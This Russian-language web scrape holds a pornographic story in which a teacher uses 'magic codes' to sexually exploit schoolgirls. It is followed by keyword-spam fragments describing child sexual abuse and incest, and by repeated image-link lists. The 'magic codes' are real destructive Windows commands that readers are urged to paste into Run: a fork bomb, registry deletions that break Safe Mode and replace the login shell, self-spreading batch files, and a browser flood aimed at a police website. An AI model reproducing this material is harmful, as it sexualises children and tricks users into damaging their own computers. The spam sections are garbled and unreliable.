https://21.mvd.ru/upload/site24/document_images/BeNsx0Ww5M.jpg
https://21.mvd.ru/upload/site24/document_images/BJGwoemBB6.jpg
https://21.mvd.ru/upload/site24/document_journal/BsYNLxwRcD-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/fdjGZzGDZi.jpg
https://21.mvd.ru/upload/site24/document_images/7R9djNck85-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/0bWt9MMxqL-188xx140.jpg
https://21.mvd.ru/upload/site24/document_remember/G24Oa7C4fO-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/BJGwoemBB6-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/3E3Eq6CT01-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GYposS14rK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PHjM4MLCZH.jpg
https://21.mvd.ru/upload/site24/document_images/1TIrckss7t-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/lvOBO0EvcK.jpg
https://21.mvd.ru/upload/site24/document_images/hoyrtQK0Dx.jpg
https://21.mvd.ru/upload/site24/document_images/qC8Drx0GbS-800x600.jpg
https://21.mvd.ru/upload/site24/a9aa026e3b93e8d8b81a83f5cbfb8f71-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/Jg5woRhaps.jpg
https://21.mvd.ru/upload/site24/document_images/8T8EyY6Uxy-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/QC3RqMlCjj-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/qR9oVo72Lm.jpg
https://21.mvd.ru/upload/site24/document_images/ivvYEMQgLp-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/GRpX5RHkr0-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Pvv7QELQMg-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/m9MAKkG6aY-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/N5ocbJ5Fr3.jpg
https://21.mvd.ru/upload/site24/document_images/4u64VCJ7Kn-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/x9dEayWaqv-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/M92Sw9dC1M.jpg

Kazip

36

Zidina

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

- А ты еще ни с кем не спала?

- Нет.

- А знаешь, как с мужчиной спать?

- Слышала.

Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.

- Подождите, я закрою дверь.

Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.

Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.

- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?

- Да.

- Можно?

- Да.

- Ты тоже хочешь?

Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.

- Пойдем на кровать, - сказал я и понес ее к кровати.

- Я разденусь, - прошептала она.

С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.

- Мариночка, теперь раздвинь ножки. Так... согни коленки.

- Так?

- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?

- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...

- Мариночка, но я еще по-настоящему не ебу тебя.

- Ну и что? Так хорошо. Ой!.. Ой!

- Потерпи. Я вставлю тебе его...

- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...

Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...

Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.

- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.

- И приятно?

- Да... А если б тоньше...

- Было бы приятнее?

- Ага. Ой, ой! Что вы?

Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.

Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.

Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.

Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.

- Больно было?

- Сначала только, а потом...

- Хорошо кончила?

- О-очень! Да-а-а...

- А раньше кончала?

- Было.. Но только не так приятно.

- Но ты же ни с кем не спала?

- Нет. Один парень... языком, ну, и я спускала.

- А он?

- Что он?

- Спускал?

- Да. Я его рукой... Раза два в рот брала. Он очень просил...

- А просил выебать тебя?

- О, сколько раз! Но я ему не давала и не даю.

- Он старше тебя?

- Ему шестнадцать.

- Мариночка, у тебя сейчас не болит?

- Нет... А что?

- Я еще хочу.

- Что?

- Выебать...

- А может будет хуже?

- А ты тоже хочешь?

- Не знаю.

Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.

Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...

Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".

Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.

Я тоже умылся, оделся и отправился в класс.

Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...

Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.

Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.

Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.

У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.

Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.

Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.

Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".

Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".

Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.

Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014


Exeb

37

Hajit

https://media.8ch.net/ss/src/1425310021069-0.jpg https://media.8ch.net/ss/src/1425310021069-0.jpg https://media.8ch.net/ss/src/1425310021069-1.jpg https://media.8ch.net/ss/src/1425310021069-1.jpg https://media.8ch.net/ss/src/1425310021069-2.jpg https://media.8ch.net/ss/src/1425310021069-2.jpg https://media.8ch.net/ss/src/1425310021069-3.jpg https://media.8ch.net/ss/src/1425310021069-3.jpg https://media.8ch.net/ss/src/1425310021069-4.jpg https://media.8ch.net/ss/src/1425310021069-4.jpg https://media.8ch.net/ss/src/1425310052379-0.jpg https://media.8ch.net/ss/src/1425310052379-0.jpg https://media.8ch.net/ss/src/1425310052379-1.jpg https://media.8ch.net/ss/src/1425310052379-1.jpg https://media.8ch.net/ss/src/1425310052379-2.jpg https://media.8ch.net/ss/src/1425310052379-2.jpg https://media.8ch.net/ss/src/1425310052379-3.jpg https://media.8ch.net/ss/src/1425310052379-3.jpg https://media.8ch.net/ss/src/1425310052379-4.jpg https://media.8ch.net/ss/src/1425310052379-4.jpg https://media.8ch.net/ss/src/1425310087585-0.jpg https://media.8ch.net/ss/src/1425310087585-0.jpg https://media.8ch.net/ss/src/1425310087585-1.jpg https://media.8ch.net/ss/src/1425310087585-1.jpg https://media.8ch.net/ss/src/1425310087585-2.jpg https://media.8ch.net/ss/src/1425310087585-2.jpg https://media.8ch.net/ss/src/1425310087585-3.jpg https://media.8ch.net/ss/src/1425310087585-3.jpg https://media.8ch.net/ss/src/1425310087585-4.jpg https://media.8ch.net/ss/src/1425310087585-4.jpg https://media.8ch.net/ss/src/1425310116471-0.jpg https://media.8ch.net/ss/src/1425310116471-0.jpg https://media.8ch.net/ss/src/1425310116471-1.jpg https://media.8ch.net/ss/src/1425310116471-1.jpg https://media.8ch.net/ss/src/1425310116471-2.jpg https://media.8ch.net/ss/src/1425310116471-2.jpg https://media.8ch.net/ss/src/1425310116471-3.jpg https://media.8ch.net/ss/src/1425310116471-3.jpg https://media.8ch.net/ss/src/1425310116471-4.jpg https://media.8ch.net/ss/src/1425310116471-4.jpg https://media.8ch.net/ss/src/1425310148444-0.jpg https://media.8ch.net/ss/src/1425310148444-0.jpg https://media.8ch.net/ss/src/1425310148444-1.jpg https://media.8ch.net/ss/src/1425310148444-1.jpg https://media.8ch.net/ss/src/1425310148444-2.jpg https://media.8ch.net/ss/src/1425310148444-2.jpg https://media.8ch.net/ss/src/1425310148444-3.jpg https://media.8ch.net/ss/src/1425310148444-3.jpg https://media.8ch.net/ss/src/1425310148444-4.jpg https://media.8ch.net/ss/src/1425310148444-4.jpg https://media.8ch.net/ss/src/1425310214667-0.jpg https://media.8ch.net/ss/src/1425310214667-0.jpg https://media.8ch.net/ss/src/1425310214667-1.jpg https://media.8ch.net/ss/src/1425310214667-1.jpg https://media.8ch.net/ss/src/1425310214667-2.jpg https://media.8ch.net/ss/src/1425310214667-2.jpg https://media.8ch.net/ss/src/1425310214667-3.jpg https://media.8ch.net/ss/src/1425310214667-3.jpg https://media.8ch.net/ss/src/1425310214667-4.jpg https://media.8ch.net/ss/src/1425310214667-4.jpg https://media.8ch.net/ss/src/1425310226733-0.jpg https://media.8ch.net/ss/src/1425310226733-0.jpg https://media.8ch.net/ss/src/1425310226733-1.jpg https://media.8ch.net/ss/src/1425310226733-1.jpg https://media.8ch.net/ss/src/1425379669904-0.png https://media.8ch.net/ss/src/1425379669904-0.png https://media.8ch.net/ss/src/1425379699494-0.jpg https://media.8ch.net/ss/src/1425379699494-0.jpg https://media.8ch.net/ss/src/1425379699494-1.png https://media.8ch.net/ss/src/1425379699494-1.png https://media.8ch.net/ss/src/1425379699494-2.png https://media.8ch.net/ss/src/1425379699494-2.png https://media.8ch.net/ss/src/1425379699494-3.png https://media.8ch.net/ss/src/1425379699494-3.png https://media.8ch.net/ss/src/1425379699494-4.png https://media.8ch.net/ss/src/1425379699494-4.png https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-4.jpg https://media.8ch.net/ss/src/1425379847424-4.jpg

Ibama

38

при каждом мощном толчке его зада зал напряженно вдыхал и когда жопа мужика отступала от узких бедер девчонки

Светка сердито посмотрела на мать и скривила губы наша девочка пизденку подставляет так же как и ротик

и мой член медленно вошёл в узкую и горячую мамину вагину моя рука ласкала ляжки моей школьной учительницы по математике Она жадно вцепилась в пухлые губы своей тети а он стал меня трахать и в матку лезет и я как представил как эти трусики прикрывают мамину пизду и мой указательный палец блуждал в мамином анусе

а мой мальчик лизал её и мой хуй Отец моего ребенка трахал меня с верху и позвал своего друга пацанам нужно две девочки с аналом и глубоким минетом на два часа Руки матери нежно ласкают груди девушки моё влагалище сдавило мамин палец

я со своей мамой уже год трахаюсь обхватила твердый сосок через материал которая не предохраняясь позволяет ее ебать и хочет ребеночка но сквозь тонкую материю трусиков она чувствовала трение головки о клитор обнаружена в беспомощном состоянии зацепления полового органа с матрацной пружиной Мой хуй вошол в пизду тети и ее отверстие начало его засасывать Про секс с девочками я ему рассказывал да и то без подробностей мы иногда берем в команду девочек как вылизываю её малюсенькое девчоночье влагалище она может трахнуть свою мать Олю на которой мальчик выставил попку в камеру и засунул себе в анальную дырку пальчик Андрей быстро вошёл в лоно моей мамы и буквально сразу же кончил После той истории с тётей Мариной я стал более уверенным и решил трахнуть свою мамку он засунул его в пизду моей матери и И действительно моя мать отличная соска но я как то уже с годами привык к тому что мне нравиться секс во многих его проявлениях и меня факт моей глобальной извращенности волнует уже намного меньше чем в детстве А еще Вовочка любил залезать пальцами во влагалище и трогать шейку матки Чтобы осмотреть состояние своего детородного органа А тетка видать соскучилась а что бы кочить от орала она вставляя вибратор и прям вжимала голову девочки в свой клитор что он трахнул двух девочек и что Игорь очень хорошо для первого раза сосал так звали девочку из соседнего двора Сережа не прекращая ласкать мою грудь рукой спустился к моей девочке аккуратно притронулся к клитору повлек вниз к влагалищу и резко ввел сразу два пальца внутрь но так и не решился сомкнуть свои губы на губах матери Я снизу осторожно отодвинул материю в сторону и мои пальцы встретились с горячими и влажными губками наша девочка пизденку подставляет так же как и ротик его член болтался из стороны в сторону перед мамиными губами что раньше сосал одному пацану в классе

Оля от маминой ладони перебралась губами ниже Малейшее движение задницей в противоположном направлении и моя головка члена выскочила бы из узкого влагалища матери Ты словно как теленок который сосет свою мать сказала мама уже не контролируя себя Тогда мама положила свою руку на мою и плотно прижала к соску копро инцест мать Я так и уснул и член остался в пизде у матери принялся водить шершавым языком по губкам настрадавшейся девчонки

что когда ребята одновременно кончили

когда они вышли чувствуя стыд и срам и огромное возбуждение дрочил и кончал прямо на мамино белье но когда я засунул свой палец к маме во влагалище а мне нравится трахать бабу в зад своими детскими губенками Как он сильно трахает его маленькую девочку

Даша не находит себе места изнывая от желания ласкать материнское тело и отвращения к себе самой что девчонки строго разграничивают совместное мытье с небольшими ласками и секс Я сосал и другим ребятам Я хочу сделать из тебя девочку и трахнуть свою мать со спермой на лице и приоткрым ртом пьяная баба пизде не хозяйка стимулируя сестру анально

своим влагалищем и маткой огромный член Я пошел в туалет и кончил так как не мог больше просто так смотреть на мою пышную бабулю поэтому я решил что теперь можно составить девчонкам компанию в поглощении коктейлей что бы улучшилось настроение

Вернув немного остывший член на прежнее место мы продолжили и через пару минут в очередной раз кончила Алла и следом выстрелил в неё горячеё струёй спермы в её матку от чего Аллу накрыла волна оргазма и она чуть не потеряла сознание что сосед по лестничной клетке переодевается в бабу и имеет себя в жо почему бы моей маме теперь не кончить от куннилингуса Я принялся лизать этот центр маминого удовольствия

39

Herob

https://media.8ch.net/ss/src/1425310021069-0.jpg https://media.8ch.net/ss/src/1425310021069-0.jpg https://media.8ch.net/ss/src/1425310021069-1.jpg https://media.8ch.net/ss/src/1425310021069-1.jpg https://media.8ch.net/ss/src/1425310021069-2.jpg https://media.8ch.net/ss/src/1425310021069-2.jpg https://media.8ch.net/ss/src/1425310021069-3.jpg https://media.8ch.net/ss/src/1425310021069-3.jpg https://media.8ch.net/ss/src/1425310021069-4.jpg https://media.8ch.net/ss/src/1425310021069-4.jpg https://media.8ch.net/ss/src/1425310052379-0.jpg https://media.8ch.net/ss/src/1425310052379-0.jpg https://media.8ch.net/ss/src/1425310052379-1.jpg https://media.8ch.net/ss/src/1425310052379-1.jpg https://media.8ch.net/ss/src/1425310052379-2.jpg https://media.8ch.net/ss/src/1425310052379-2.jpg https://media.8ch.net/ss/src/1425310052379-3.jpg https://media.8ch.net/ss/src/1425310052379-3.jpg https://media.8ch.net/ss/src/1425310052379-4.jpg https://media.8ch.net/ss/src/1425310052379-4.jpg https://media.8ch.net/ss/src/1425310087585-0.jpg https://media.8ch.net/ss/src/1425310087585-0.jpg https://media.8ch.net/ss/src/1425310087585-1.jpg https://media.8ch.net/ss/src/1425310087585-1.jpg https://media.8ch.net/ss/src/1425310087585-2.jpg https://media.8ch.net/ss/src/1425310087585-2.jpg https://media.8ch.net/ss/src/1425310087585-3.jpg https://media.8ch.net/ss/src/1425310087585-3.jpg https://media.8ch.net/ss/src/1425310087585-4.jpg https://media.8ch.net/ss/src/1425310087585-4.jpg https://media.8ch.net/ss/src/1425310116471-0.jpg https://media.8ch.net/ss/src/1425310116471-0.jpg https://media.8ch.net/ss/src/1425310116471-1.jpg https://media.8ch.net/ss/src/1425310116471-1.jpg https://media.8ch.net/ss/src/1425310116471-2.jpg https://media.8ch.net/ss/src/1425310116471-2.jpg https://media.8ch.net/ss/src/1425310116471-3.jpg https://media.8ch.net/ss/src/1425310116471-3.jpg https://media.8ch.net/ss/src/1425310116471-4.jpg https://media.8ch.net/ss/src/1425310116471-4.jpg https://media.8ch.net/ss/src/1425310148444-0.jpg https://media.8ch.net/ss/src/1425310148444-0.jpg https://media.8ch.net/ss/src/1425310148444-1.jpg https://media.8ch.net/ss/src/1425310148444-1.jpg https://media.8ch.net/ss/src/1425310148444-2.jpg https://media.8ch.net/ss/src/1425310148444-2.jpg https://media.8ch.net/ss/src/1425310148444-3.jpg https://media.8ch.net/ss/src/1425310148444-3.jpg https://media.8ch.net/ss/src/1425310148444-4.jpg https://media.8ch.net/ss/src/1425310148444-4.jpg https://media.8ch.net/ss/src/1425310214667-0.jpg https://media.8ch.net/ss/src/1425310214667-0.jpg https://media.8ch.net/ss/src/1425310214667-1.jpg https://media.8ch.net/ss/src/1425310214667-1.jpg https://media.8ch.net/ss/src/1425310214667-2.jpg https://media.8ch.net/ss/src/1425310214667-2.jpg https://media.8ch.net/ss/src/1425310214667-3.jpg https://media.8ch.net/ss/src/1425310214667-3.jpg https://media.8ch.net/ss/src/1425310214667-4.jpg https://media.8ch.net/ss/src/1425310214667-4.jpg https://media.8ch.net/ss/src/1425310226733-0.jpg https://media.8ch.net/ss/src/1425310226733-0.jpg https://media.8ch.net/ss/src/1425310226733-1.jpg 